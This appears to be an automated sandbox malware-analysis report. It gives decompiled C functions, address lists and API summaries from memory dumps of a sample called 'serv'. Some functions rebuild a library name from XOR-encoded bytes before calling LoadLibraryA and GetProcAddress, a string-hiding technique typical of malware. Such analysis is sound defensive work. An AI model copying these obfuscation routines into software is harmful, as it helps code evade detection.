                                                                    0x0042968c
                                                                    0x0042968e
                                                                    0x00429694
                                                                    0x00429697
                                                                    0x0042969d
                                                                    0x0042969e
                                                                    0x0042969f
                                                                    0x004296a2
                                                                    0x004296a5
                                                                    0x004296b1
                                                                    0x004296b3
                                                                    0x00000000
                                                                    0x004296b3
                                                                    0x00000000
                                                                    0x00429650
                                                                    0x00429659
                                                                    0x0042965b
                                                                    0x0042965d
                                                                    0x00429690
                                                                    0x00429690
                                                                    0x00000000
                                                                    0x00429690
                                                                    0x00429664
                                                                    0x00429669
                                                                    0x0042966c
                                                                    0x00000000
                                                                    0x0042966c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004293c3
                                                                    0x004293c6
                                                                    0x004295ca
                                                                    0x004295ca
                                                                    0x004296f2
                                                                    0x004296fa
                                                                    0x004296fa
                                                                    0x004293cc
                                                                    0x004293ce
                                                                    0x004293d1
                                                                    0x004293d4
                                                                    0x004293da
                                                                    0x004293dc
                                                                    0x004293e1
                                                                    0x004293e1
                                                                    0x00429405
                                                                    0x00429407
                                                                    0x0042940c
                                                                    0x00000000
                                                                    0x00429412
                                                                    0x00429412
                                                                    0x00429422
                                                                    0x00429427
                                                                    0x0042942c
                                                                    0x0042942f
                                                                    0x00429453
                                                                    0x00429471
                                                                    0x00429488
                                                                    0x00429574
                                                                    0x00429574
                                                                    0x00429577
                                                                    0x00429579
                                                                    0x0042957c
                                                                    0x00429581
                                                                    0x00429582
                                                                    0x00429585
                                                                    0x00429587
                                                                    0x0042958a
                                                                    0x0042958f
                                                                    0x00429590
                                                                    0x00000000
                                                                    0x00429590
                                                                    0x004294a0
                                                                    0x004294a2
                                                                    0x004294a7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004294b1
                                                                    0x004294e0
                                                                    0x004294f0
                                                                    0x004294f5
                                                                    0x004294fa
                                                                    0x004294fd
                                                                    0x0042951e
                                                                    0x00429521
                                                                    0x0042953b
                                                                    0x0042954f
                                                                    0x00429551
                                                                    0x00429553
                                                                    0x00429554
                                                                    0x00429555
                                                                    0x00429558
                                                                    0x0042955e
                                                                    0x00429561
                                                                    0x0042955a
                                                                    0x0042955a
                                                                    0x0042955b
                                                                    0x0042955b
                                                                    0x00429572
                                                                    0x00429572
                                                                    0x00000000
                                                                    0x00429523
                                                                    0x00429527
                                                                    0x0042952d
                                                                    0x00429530
                                                                    0x00429532
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00429534
                                                                    0x00000000
                                                                    0x00429534
                                                                    0x00429521
                                                                    0x004294b6
                                                                    0x004294d5
                                                                    0x004294d5
                                                                    0x00000000
                                                                    0x00429455
                                                                    0x00429459
                                                                    0x0042945e
                                                                    0x0042945f
                                                                    0x00429464
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042946a
                                                                    0x00000000
                                                                    0x0042946a
                                                                    0x00429453
                                                                    0x0042940c
                                                                    0x004293b5
                                                                    0x00429392
                                                                    0x00429395
                                                                    0x00429398
                                                                    0x00429398
                                                                    0x0042939b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042939d
                                                                    0x004293a0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004293a2
                                                                    0x00000000
                                                                    0x004293a2
                                                                    0x004293aa
                                                                    0x00000000

                                                                    APIs
                                                                    • LCMapStringW.KERNEL32(00000000,00000100,00430BB4,00000001,00000000,00000000,004312F0,00000038,0042764F,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 00429366
                                                                    • GetLastError.KERNEL32 ref: 00429378
                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,0042788D,?,00000000,00000000,004312F0,00000038,0042764F,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 004293FF
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,0042788D,?,?,00000000), ref: 00429480
                                                                    • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0042949A
                                                                    • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 004294D5
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: String$ByteCharMultiWide$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1775797328-0
                                                                    • Opcode ID: c7fdf2a015abe2d7e692b896d6b38bfc2f21390444977ff8440e0f31090a051b
                                                                    • Instruction ID: b9568866b9305004aba30022c6f045a69541abf634a3c6620ae29432a45a26aa
                                                                    • Opcode Fuzzy Hash: c7fdf2a015abe2d7e692b896d6b38bfc2f21390444977ff8440e0f31090a051b
                                                                    • Instruction Fuzzy Hash: 1EB18E72A0012AFFCF119FA0EC849EE7BB5FF08354F50422AF915A2260D7398D91DB58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E10002500(CHAR* _a4) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				void* _v16;
                                                                    				struct HINSTANCE__* _t21;
                                                                    				void* _t27;
                                                                    				_Unknown_base(*)()* _t39;
                                                                    				void* _t41;
                                                                    
                                                                    				_t41 =  &_v16;
                                                                    				_t21 =  *0x100040cc;
                                                                    				if(_t21 != 0) {
                                                                    					L6:
                                                                    					_t39 = GetProcAddress(_t21, _a4);
                                                                    					if(_t39 == 0 &&  *0x100040c8 != 0) {
                                                                    						E10002190(1);
                                                                    					}
                                                                    					return _t39;
                                                                    				}
                                                                    				_v4 = 0x4f;
                                                                    				_v3 = 0x4f;
                                                                    				_v12 = 0x56;
                                                                    				_v11 = 0x50;
                                                                    				_v10 = 0x46;
                                                                    				_v9 = 0x51;
                                                                    				_v8 = 0x10;
                                                                    				_v7 = 0x11;
                                                                    				_v6 = 0xd;
                                                                    				_v5 = 0x47;
                                                                    				_v2 = 0x23;
                                                                    				_t27 = 0;
                                                                    				do {
                                                                    					 *(_t41 + _t27 + 4) =  *(_t41 + _t27 + 4) ^ 0x00000023;
                                                                    					_t27 = _t27 + 1;
                                                                    				} while (_t27 < 0xb);
                                                                    				_t21 = LoadLibraryA( &_v12);
                                                                    				 *0x100040cc = _t21;
                                                                    				if(_t21 == 0 &&  *0x100040c8 != 0) {
                                                                    					E10002190(1);
                                                                    					_t21 =  *0x100040cc;
                                                                    				}
                                                                    				goto L6;
                                                                    			}



















                                                                    0x1000250c
                                                                    0x1000251c
                                                                    0x10002523
                                                                    0x10002595
                                                                    0x100025a2
                                                                    0x100025a6
                                                                    0x100025b3
                                                                    0x100025b3
                                                                    0x100025be
                                                                    0x100025be
                                                                    0x10002527
                                                                    0x1000252b
                                                                    0x1000252f
                                                                    0x10002534
                                                                    0x10002539
                                                                    0x1000253e
                                                                    0x10002543
                                                                    0x10002548
                                                                    0x1000254d
                                                                    0x10002552
                                                                    0x10002557
                                                                    0x1000255c
                                                                    0x10002560
                                                                    0x10002560
                                                                    0x10002565
                                                                    0x10002566
                                                                    0x10002570
                                                                    0x10002578
                                                                    0x1000257d
                                                                    0x1000258b
                                                                    0x10002590
                                                                    0x10002590
                                                                    0x00000000

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(00000023), ref: 10002570
                                                                    • GetProcAddress.KERNEL32(?,?), ref: 1000259C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.620088521.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000002.00000002.620072527.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000002.00000002.620100922.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_10000000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: #$#$F$G$P$Q
                                                                    • API String ID: 2574300362-189938813
                                                                    • Opcode ID: 85526682089642a1a191ef98a5032ff5b6a26aa1e25d8beaa3dcf4245c658d9a
                                                                    • Instruction ID: 1e3a1da13fb46e32d40784adfcd152dc9c95e329f3a4c81bbfbf86ce7eaf182f
                                                                    • Opcode Fuzzy Hash: 85526682089642a1a191ef98a5032ff5b6a26aa1e25d8beaa3dcf4245c658d9a
                                                                    • Instruction Fuzzy Hash: D721CD702083919AF306DB68CCA875BBFC49B552C5F09C84CE588DB246E6B4C844876B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041A600(CHAR* _a4) {
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				signed int _v20;
                                                                    				char _v21;
                                                                    				signed int _t33;
                                                                    				signed int _t35;
                                                                    				intOrPtr _t37;
                                                                    				struct HINSTANCE__* _t38;
                                                                    				intOrPtr _t41;
                                                                    				void* _t45;
                                                                    				signed char _t50;
                                                                    				signed int _t54;
                                                                    				signed char _t55;
                                                                    				void* _t61;
                                                                    				intOrPtr _t62;
                                                                    				signed char _t65;
                                                                    				signed int _t66;
                                                                    				void* _t73;
                                                                    				_Unknown_base(*)()* _t74;
                                                                    				signed char _t75;
                                                                    				void* _t76;
                                                                    
                                                                    				_t54 =  *0x447d78; // 0x0
                                                                    				_t33 = _t54;
                                                                    				_v20 = _t33 * 0x5a >> 0x20;
                                                                    				_v21 = _t33 * 0x5a;
                                                                    				_t35 = _v20;
                                                                    				_t65 = _t35 * 0x67 >> 0x20;
                                                                    				_t55 = _t54 - _t35 * 0x67;
                                                                    				_t37 = _v21;
                                                                    				_t73 = 0x27;
                                                                    				do {
                                                                    					_t65 = _t65 - _t37;
                                                                    					_t73 = _t73 - 1;
                                                                    				} while (_t73 != 0);
                                                                    				_t38 =  *0x447d88; // 0x74700000
                                                                    				_t50 = _t55 ^ _t65 | 0x0000004f;
                                                                    				if(_t38 != 0) {
                                                                    					L10:
                                                                    					_t74 = GetProcAddress(_t38, _a4);
                                                                    					if(_t74 == 0) {
                                                                    						_t41 =  *0x447d7c; // 0x1
                                                                    						if(_t41 != 0) {
                                                                    							E0041A720(1);
                                                                    						}
                                                                    					}
                                                                    					return _t74;
                                                                    				} else {
                                                                    					_v15 = 0x43;
                                                                    					_v12 = 0x43;
                                                                    					_v11 = 0x4a;
                                                                    					_v6 = 0x4a;
                                                                    					_v5 = 0x4a;
                                                                    					_v16 = 0x4d;
                                                                    					_v14 = 0x54;
                                                                    					_v13 = 0x48;
                                                                    					_v10 = 0x15;
                                                                    					_v9 = 0x14;
                                                                    					_v8 = 8;
                                                                    					_v7 = 0x42;
                                                                    					_v4 = 0x26;
                                                                    					_t45 = 0;
                                                                    					goto L4;
                                                                    					do {
                                                                    						L6:
                                                                    						_t66 = _t66 + (_t66 - _t75 | 0x0000005d);
                                                                    						_t61 = _t61 - 1;
                                                                    					} while (_t61 != 0);
                                                                    					if(_t38 == 0) {
                                                                    						_t62 =  *0x447d7c; // 0x1
                                                                    						if(_t62 != 0) {
                                                                    							E0041A720(1);
                                                                    							_t38 =  *0x447d88; // 0x74700000
                                                                    						}
                                                                    					}
                                                                    					goto L10;
                                                                    					L4:
                                                                    					 *(_t76 + _t45 + 0x10) =  *(_t76 + _t45 + 0x10) ^ 0x00000026;
                                                                    					_t45 = _t45 + 1;
                                                                    					if(_t45 < 0xd) {
                                                                    						goto L4;
                                                                    					} else {
                                                                    						_t38 = LoadLibraryA( &_v16);
                                                                    						_t66 = _v20;
                                                                    						_t75 = _t50;
                                                                    						 *0x447d88 = _t38;
                                                                    						_t61 = 0x1f;
                                                                    						goto L6;
                                                                    					}
                                                                    				}
                                                                    			}



































                                                                    0x0041a603
                                                                    0x0041a610
                                                                    0x0041a61b
                                                                    0x0041a61f
                                                                    0x0041a623
                                                                    0x0041a629
                                                                    0x0041a62b
                                                                    0x0041a62d
                                                                    0x0041a631
                                                                    0x0041a636
                                                                    0x0041a636
                                                                    0x0041a638
                                                                    0x0041a638
                                                                    0x0041a63b
                                                                    0x0041a647
                                                                    0x0041a649
                                                                    0x0041a6f6
                                                                    0x0041a702
                                                                    0x0041a706
                                                                    0x0041a708
                                                                    0x0041a70f
                                                                    0x0041a713
                                                                    0x0041a713
                                                                    0x0041a70f
                                                                    0x0041a71f
                                                                    0x0041a64f
                                                                    0x0041a651
                                                                    0x0041a655
                                                                    0x0041a65b
                                                                    0x0041a65f
                                                                    0x0041a663
                                                                    0x0041a667
                                                                    0x0041a66c
                                                                    0x0041a671
                                                                    0x0041a676
                                                                    0x0041a67b
                                                                    0x0041a680
                                                                    0x0041a685
                                                                    0x0041a68a
                                                                    0x0041a68f
                                                                    0x0041a68f
                                                                    0x0041a6d0
                                                                    0x0041a6d0
                                                                    0x0041a6d6
                                                                    0x0041a6d8
                                                                    0x0041a6d8
                                                                    0x0041a6de
                                                                    0x0041a6e0
                                                                    0x0041a6e8
                                                                    0x0041a6ec
                                                                    0x0041a6f1
                                                                    0x0041a6f1
                                                                    0x0041a6e8
                                                                    0x00000000
                                                                    0x0041a691
                                                                    0x0041a691
                                                                    0x0041a696
                                                                    0x0041a69a
                                                                    0x00000000
                                                                    0x0041a69c
                                                                    0x0041a6a2
                                                                    0x0041a6a8
                                                                    0x0041a6ac
                                                                    0x0041a6c0
                                                                    0x0041a6c5
                                                                    0x00000000
                                                                    0x0041a6c5
                                                                    0x0041a69a

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(?,00000000), ref: 0041A6A2
                                                                    • GetProcAddress.KERNEL32(74700000,?), ref: 0041A6FC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: &$&$B$H$T
                                                                    • API String ID: 2574300362-3028964318
                                                                    • Opcode ID: 484a06480022a4c012af639c51322cb882ed4a2c1c66c252459cc2ff750290e3
                                                                    • Instruction ID: 867886ee0e591554facc4739b1117f480313de392c298fcd43fe06b41dcd9fa2
                                                                    • Opcode Fuzzy Hash: 484a06480022a4c012af639c51322cb882ed4a2c1c66c252459cc2ff750290e3
                                                                    • Instruction Fuzzy Hash: F231BE2960D3818ED306CF3898547EBBBE45FA6344F08446EE5D487382C268CA4DC7A7
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E10002070(CHAR* _a4) {
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				signed int _v20;
                                                                    				char _v21;
                                                                    				signed int _t33;
                                                                    				signed int _t35;
                                                                    				intOrPtr _t37;
                                                                    				struct HINSTANCE__* _t38;
                                                                    				void* _t45;
                                                                    				signed char _t50;
                                                                    				signed int _t54;
                                                                    				signed char _t55;
                                                                    				void* _t61;
                                                                    				signed char _t65;
                                                                    				signed int _t66;
                                                                    				void* _t73;
                                                                    				_Unknown_base(*)()* _t74;
                                                                    				signed char _t75;
                                                                    				void* _t76;
                                                                    
                                                                    				_t54 =  *0x100040c4;
                                                                    				_t33 = _t54;
                                                                    				_v20 = _t33 * 0x5a >> 0x20;
                                                                    				_v21 = _t33 * 0x5a;
                                                                    				_t35 = _v20;
                                                                    				_t65 = _t35 * 0x67 >> 0x20;
                                                                    				_t55 = _t54 - _t35 * 0x67;
                                                                    				_t37 = _v21;
                                                                    				_t73 = 0x27;
                                                                    				do {
                                                                    					_t65 = _t65 - _t37;
                                                                    					_t73 = _t73 - 1;
                                                                    				} while (_t73 != 0);
                                                                    				_t38 =  *0x100040d4;
                                                                    				_t50 = _t55 ^ _t65 | 0x0000004f;
                                                                    				if(_t38 != 0) {
                                                                    					L10:
                                                                    					_t74 = GetProcAddress(_t38, _a4);
                                                                    					if(_t74 == 0 &&  *0x100040c8 != 0) {
                                                                    						E10002190(1);
                                                                    					}
                                                                    					return _t74;
                                                                    				}
                                                                    				_v15 = 0x43;
                                                                    				_v12 = 0x43;
                                                                    				_v11 = 0x4a;
                                                                    				_v6 = 0x4a;
                                                                    				_v5 = 0x4a;
                                                                    				_v16 = 0x4d;
                                                                    				_v14 = 0x54;
                                                                    				_v13 = 0x48;
                                                                    				_v10 = 0x15;
                                                                    				_v9 = 0x14;
                                                                    				_v8 = 8;
                                                                    				_v7 = 0x42;
                                                                    				_v4 = 0x26;
                                                                    				_t45 = 0;
                                                                    				do {
                                                                    					 *(_t76 + _t45 + 0x10) =  *(_t76 + _t45 + 0x10) ^ 0x00000026;
                                                                    					_t45 = _t45 + 1;
                                                                    				} while (_t45 < 0xd);
                                                                    				_t38 = LoadLibraryA( &_v16);
                                                                    				_t66 = _v20;
                                                                    				_t75 = _t50;
                                                                    				 *0x100040d4 = _t38;
                                                                    				_t61 = 0x1f;
                                                                    				do {
                                                                    					_t66 = _t66 + (_t66 - _t75 | 0x0000005d);
                                                                    					_t61 = _t61 - 1;
                                                                    				} while (_t61 != 0);
                                                                    				if(_t38 == 0 &&  *0x100040c8 != 0) {
                                                                    					E10002190(1);
                                                                    					_t38 =  *0x100040d4;
                                                                    				}
                                                                    				goto L10;
                                                                    			}

































                                                                    0x10002073
                                                                    0x10002080
                                                                    0x1000208b
                                                                    0x1000208f
                                                                    0x10002093
                                                                    0x10002099
                                                                    0x1000209b
                                                                    0x1000209d
                                                                    0x100020a1
                                                                    0x100020a6
                                                                    0x100020a6
                                                                    0x100020a8
                                                                    0x100020a8
                                                                    0x100020ab
                                                                    0x100020b7
                                                                    0x100020b9
                                                                    0x10002166
                                                                    0x10002172
                                                                    0x10002176
                                                                    0x10002183
                                                                    0x10002183
                                                                    0x1000218f
                                                                    0x1000218f
                                                                    0x100020c1
                                                                    0x100020c5
                                                                    0x100020cb
                                                                    0x100020cf
                                                                    0x100020d3
                                                                    0x100020d7
                                                                    0x100020dc
                                                                    0x100020e1
                                                                    0x100020e6
                                                                    0x100020eb
                                                                    0x100020f0
                                                                    0x100020f5
                                                                    0x100020fa
                                                                    0x100020ff
                                                                    0x10002101
                                                                    0x10002101
                                                                    0x10002106
                                                                    0x10002107
                                                                    0x10002112
                                                                    0x10002118
                                                                    0x1000211c
                                                                    0x10002130
                                                                    0x10002135
                                                                    0x10002140
                                                                    0x10002146
                                                                    0x10002148
                                                                    0x10002148
                                                                    0x1000214e
                                                                    0x1000215c
                                                                    0x10002161
                                                                    0x10002161
                                                                    0x00000000

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(?), ref: 10002112
                                                                    • GetProcAddress.KERNEL32(?,?), ref: 1000216C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.620088521.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000002.00000002.620072527.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000002.00000002.620100922.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_10000000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: &$&$B$H$T
                                                                    • API String ID: 2574300362-3028964318
                                                                    • Opcode ID: c4a6b7a139f3c06b57d302f348d2237933c0d3c526b40bc678af7c443a9754c7
                                                                    • Instruction ID: 291537e56b0eada5cc024d848441126881085dabb14679c31ce073b4356d34c7
                                                                    • Opcode Fuzzy Hash: c4a6b7a139f3c06b57d302f348d2237933c0d3c526b40bc678af7c443a9754c7
                                                                    • Instruction Fuzzy Hash: 4F31A12560C3D28FE306CF7888947DBBFD49BA6285F09485DE6C497356C6788A0CC7A2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 86%
                                                                    			E004298E5(void* __ebx, void* __edi, int __esi, void* __eflags) {
                                                                    				intOrPtr _t54;
                                                                    				int _t56;
                                                                    				char* _t57;
                                                                    				int _t68;
                                                                    				char* _t69;
                                                                    				int _t70;
                                                                    				int _t73;
                                                                    				void* _t77;
                                                                    				int _t81;
                                                                    				short* _t82;
                                                                    				void* _t97;
                                                                    				short* _t98;
                                                                    
                                                                    				_t94 = __esi;
                                                                    				_push(0x38);
                                                                    				_push(0x431328);
                                                                    				E0042422C(__ebx, __edi, __esi);
                                                                    				_t54 =  *0x446f24; // 0x81a0b55c
                                                                    				 *((intOrPtr*)(_t97 - 0x1c)) = _t54;
                                                                    				 *(_t97 - 0x34) = 0;
                                                                    				 *(_t97 - 0x44) = 0;
                                                                    				_t81 =  *( *(_t97 + 0x14));
                                                                    				 *(_t97 - 0x40) = _t81;
                                                                    				 *(_t97 - 0x3c) = 0;
                                                                    				_t56 =  *(_t97 + 8);
                                                                    				if(_t56 ==  *(_t97 + 0xc)) {
                                                                    					_t82 =  *(_t97 - 0x48);
                                                                    					goto L31;
                                                                    				} else {
                                                                    					_t85 = _t97 - 0x30;
                                                                    					if(GetCPInfo(_t56, _t97 - 0x30) != 0 &&  *(_t97 - 0x30) == 1 && GetCPInfo( *(_t97 + 0xc), _t97 - 0x30) != 0 &&  *(_t97 - 0x30) == 1) {
                                                                    						 *(_t97 - 0x3c) = 1;
                                                                    					}
                                                                    					if( *(_t97 - 0x3c) == 0) {
                                                                    						_t94 =  *(_t97 - 0x38);
                                                                    					} else {
                                                                    						if(_t81 == 0xffffffff) {
                                                                    							_t77 = E00422F20( *(_t97 + 0x10));
                                                                    							_pop(_t85);
                                                                    							_t94 = _t77 + 1;
                                                                    							__eflags = _t94;
                                                                    						} else {
                                                                    							_t94 = _t81;
                                                                    						}
                                                                    						 *(_t97 - 0x38) = _t94;
                                                                    					}
                                                                    					if( *(_t97 - 0x3c) != 0) {
                                                                    						L14:
                                                                    						 *(_t97 - 4) = 0;
                                                                    						E00422920(_t94 + _t94 + 0x00000003 & 0xfffffffc, _t85);
                                                                    						 *(_t97 - 0x18) = _t98;
                                                                    						_t82 = _t98;
                                                                    						 *(_t97 - 0x48) = _t82;
                                                                    						E004282F0(_t82, 0, _t94 + _t94);
                                                                    						 *(_t97 - 4) =  *(_t97 - 4) | 0xffffffff;
                                                                    						_t111 = _t82;
                                                                    						if(_t82 != 0) {
                                                                    							L19:
                                                                    							_t68 = MultiByteToWideChar( *(_t97 + 8), 1,  *(_t97 + 0x10),  *(_t97 - 0x40), _t82, _t94);
                                                                    							__eflags = _t68;
                                                                    							if(_t68 == 0) {
                                                                    								L31:
                                                                    								__eflags =  *(_t97 - 0x44);
                                                                    								if(__eflags != 0) {
                                                                    									_push(_t82);
                                                                    									E0042275E(_t82, 0, _t94, __eflags);
                                                                    								}
                                                                    								_t57 =  *(_t97 - 0x34);
                                                                    								goto L34;
                                                                    							}
                                                                    							__eflags =  *(_t97 + 0x18);
                                                                    							if( *(_t97 + 0x18) == 0) {
                                                                    								__eflags =  *(_t97 - 0x3c);
                                                                    								if(__eflags != 0) {
                                                                    									L25:
                                                                    									_push(_t94);
                                                                    									_push(1);
                                                                    									_t69 = E00427472(_t82, 0, _t94, __eflags);
                                                                    									 *(_t97 - 0x34) = _t69;
                                                                    									__eflags = _t69;
                                                                    									if(_t69 != 0) {
                                                                    										_t70 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94, _t69, _t94, 0, 0);
                                                                    										__eflags = _t70;
                                                                    										if(__eflags != 0) {
                                                                    											__eflags =  *(_t97 - 0x40) - 0xffffffff;
                                                                    											if( *(_t97 - 0x40) != 0xffffffff) {
                                                                    												 *( *(_t97 + 0x14)) = _t70;
                                                                    											}
                                                                    										} else {
                                                                    											_push( *(_t97 - 0x34));
                                                                    											E0042275E(_t82, 0, _t94, __eflags);
                                                                    											 *(_t97 - 0x34) = 0;
                                                                    										}
                                                                    									}
                                                                    									goto L31;
                                                                    								}
                                                                    								_t94 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94, 0, 0, 0, 0);
                                                                    								__eflags = _t94;
                                                                    								if(__eflags == 0) {
                                                                    									goto L31;
                                                                    								}
                                                                    								goto L25;
                                                                    							}
                                                                    							_t73 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94,  *(_t97 + 0x18),  *(_t97 + 0x1c), 0, 0);
                                                                    							__eflags = _t73;
                                                                    							if(_t73 != 0) {
                                                                    								 *(_t97 - 0x34) =  *(_t97 + 0x18);
                                                                    							}
                                                                    							goto L31;
                                                                    						} else {
                                                                    							_push(_t94);
                                                                    							_push(2);
                                                                    							_t82 = E00427472(_t82, 0, _t94, _t111);
                                                                    							if(_t82 != 0) {
                                                                    								 *(_t97 - 0x44) = 1;
                                                                    								goto L19;
                                                                    							}
                                                                    							goto L17;
                                                                    						}
                                                                    					} else {
                                                                    						_t94 = MultiByteToWideChar( *(_t97 + 8), 1,  *(_t97 + 0x10), _t81, 0, 0);
                                                                    						 *(_t97 - 0x38) = _t94;
                                                                    						if(_t94 == 0) {
                                                                    							L17:
                                                                    							_t57 = 0;
                                                                    							L34:
                                                                    							return E00424267(E00428381(_t57,  *((intOrPtr*)(_t97 - 0x1c))));
                                                                    						}
                                                                    						goto L14;
                                                                    					}
                                                                    				}
                                                                    			}















                                                                    0x004298e5
                                                                    0x004298e5
                                                                    0x004298e7
                                                                    0x004298ec
                                                                    0x004298f1
                                                                    0x004298f6
                                                                    0x004298fb
                                                                    0x004298fe
                                                                    0x00429904
                                                                    0x00429906
                                                                    0x00429909
                                                                    0x0042990c
                                                                    0x00429912
                                                                    0x00429a8b
                                                                    0x00000000
                                                                    0x00429918
                                                                    0x00429918
                                                                    0x00429927
                                                                    0x00429942
                                                                    0x00429942
                                                                    0x0042994c
                                                                    0x00429968
                                                                    0x0042994e
                                                                    0x00429951
                                                                    0x0042995a
                                                                    0x0042995f
                                                                    0x00429962
                                                                    0x00429962
                                                                    0x00429953
                                                                    0x00429953
                                                                    0x00429953
                                                                    0x00429963
                                                                    0x00429963
                                                                    0x0042996e
                                                                    0x0042998a
                                                                    0x0042998a
                                                                    0x00429996
                                                                    0x0042999b
                                                                    0x0042999e
                                                                    0x004299a0
                                                                    0x004299a9
                                                                    0x004299b1
                                                                    0x004299ce
                                                                    0x004299d0
                                                                    0x004299f0
                                                                    0x004299fd
                                                                    0x00429a03
                                                                    0x00429a05
                                                                    0x00429a8e
                                                                    0x00429a8e
                                                                    0x00429a91
                                                                    0x00429a93
                                                                    0x00429a94
                                                                    0x00429a99
                                                                    0x00429a9a
                                                                    0x00000000
                                                                    0x00429a9a
                                                                    0x00429a0b
                                                                    0x00429a0e
                                                                    0x00429a30
                                                                    0x00429a33
                                                                    0x00429a4b
                                                                    0x00429a4b
                                                                    0x00429a4c
                                                                    0x00429a4e
                                                                    0x00429a55
                                                                    0x00429a58
                                                                    0x00429a5a
                                                                    0x00429a66
                                                                    0x00429a6c
                                                                    0x00429a6e
                                                                    0x00429a7e
                                                                    0x00429a82
                                                                    0x00429a87
                                                                    0x00429a87
                                                                    0x00429a70
                                                                    0x00429a70
                                                                    0x00429a73
                                                                    0x00429a79
                                                                    0x00429a79
                                                                    0x00429a6e
                                                                    0x00000000
                                                                    0x00429a5a
                                                                    0x00429a45
                                                                    0x00429a47
                                                                    0x00429a49
                                                                    0x00000000
